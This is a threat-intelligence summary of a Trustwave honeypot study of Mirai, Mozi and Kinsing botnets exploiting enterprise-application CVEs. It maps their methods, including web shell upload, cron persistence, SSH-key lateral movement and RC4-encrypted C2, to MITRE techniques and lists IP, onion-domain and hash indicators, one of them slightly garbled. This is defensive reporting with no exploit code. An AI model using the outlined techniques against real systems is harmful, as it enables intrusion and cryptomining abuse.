Trustwave’s honeypot network across six countries reveals how Mirai, Mozi, and Kinsing botnets targeted enterprise applications to upload web shells and recruit devices into botnets for DDoS or cryptomining. The report details leveraging PoCs and CVEs (GoAnywhere MFT, FortiNAC, Bitbucket, F5 Big-IP, etc.), rapid exploit uptake, and extensive use of HTTP/HTTPS infrastructure, with emphasis on persistence, lateral movement, and evolving evasion techniques. #GoAnywhereMFT #FortiNAC #Bitbucket #Mirai #Mozi #Kinsing #XMRig #OracleWebLogic
Keypoints
- Trustwave deployed honeypot sensors in six countries (Russia, Ukraine, Poland, UK, China, United States) to study how attackers exploit enterprise apps.
- Over a six-month window through May 2023, 38,000+ unique IPs and 1,100+ payloads were observed; about 19% of web traffic was malicious, with botnets responsible for 95% of that traffic.
- Most exploit traffic targeted public-facing enterprise apps and aimed to upload a web shell for further access.
- Mirai, Mozi, and Kinsing accounted for roughly 95% of HTTP/HTTPS exploit attempts, underscoring IoT/OT device vulnerabilities and crypto-mining goals.
- Infections leveraged one-step exploits using wget/curl and revealed exploit templates via reverse engineering; PoCs were quickly weaponized (e.g., FortiNAC CVE-2022-39952 just six days after PoC release).
- Kinsing employs RC4-based C2 encryption, cron-based persistence, SSH-key–driven lateral movement, and a staged Windows/Linux infection chain (including wbw.xml and 1.ps1).
MITRE Techniques
- [T1505.003] Web Shell – Upload a web shell to gain ongoing access. “The primary objective of these attacks was to upload a web shell, enabling attackers to carry out further actions against the potential victims that our sensors were mimicking.”‘
- [T1190] Exploit Public-Facing Application – Exploitation of disclosed CVEs (GoAnywhere MFT, FortiNAC, Bitbucket, etc.). “payload was meant to confirm presence of CVE-2023-0669 vulnerability by triggering a DNS lookup” and PoCs were rapidly deployed.”‘
- [T1105] Ingress Tool Transfer – Initial payload delivery using wget/curl to fetch exploit payloads. “These exploits commonly involved operations such as ‘wget’ or ‘curl’.”‘
- [T1021.004] SSH – Lateral Movement via SSH keys found on the victim’s file system. “lateral movement to other machines using SSH keys found on the victim’s file system.”‘
- [T1071.001] Web Protocols – Command and Control over HTTP/HTTPS traffic. “Mirai, Mozi, and Kinsing botnets accounted for 95% of the recorded exploit attempts conducted over the HTTP/HTTPS protocol.”‘
- [T1573] Encrypted Channel – Encrypted C2 communications (RC4). “Kinsing stores RC4-encrypted C2 URL addresses in the binary, allowing for easy decryption using the hex encoded key… Communication with the C2 server utilizes the RC4 cipher.”‘
- [T1053.003] Cron – Persistence via cron scheduling. “To ensure persistence, the installer script is added to the cron schedule.”‘
- [T1059.001] PowerShell – Use of PowerShell scripts for downloading and executing payloads. “downloading a PowerShell script named ‘1.ps1’ … The 1.ps1 script downloads an executable file for the XMRig cryptocurrency miner.”‘
Indicators of Compromise
- [IP Address] context – 14.190.186.61, 14.244.239.227 (GoAnywhere MFT CVE-2023-0669 tests).
- [IP Address] context – 185.122.204.197, 185.122.204.196 (Kinsing payload servers).
- [Domain] context – rol ibztiz3zfysof5q2rja6airtmbw74am4oc4rgqsh3ktir6zwdmzid.onion:80 (Tor-based C2 proxy).
- [File Hash] context – f65fb40e8aa071ed3bd5456126815d60bc3afd2e18944edc1e5fcf2ea6477429 (Mirai mips SHA256).
- [File Hash] context – a3df063e24dc5325c9ab6b8c10a709d436213cf08626d890c605d2e2626f91d4 (Mirai mips SHA256).
- [File Name] context – goshell.jsp and wbw.xml (GoAnywhere/Windows-based exploit artifacts in the Kinsing Windows/Oracle WebLogic path).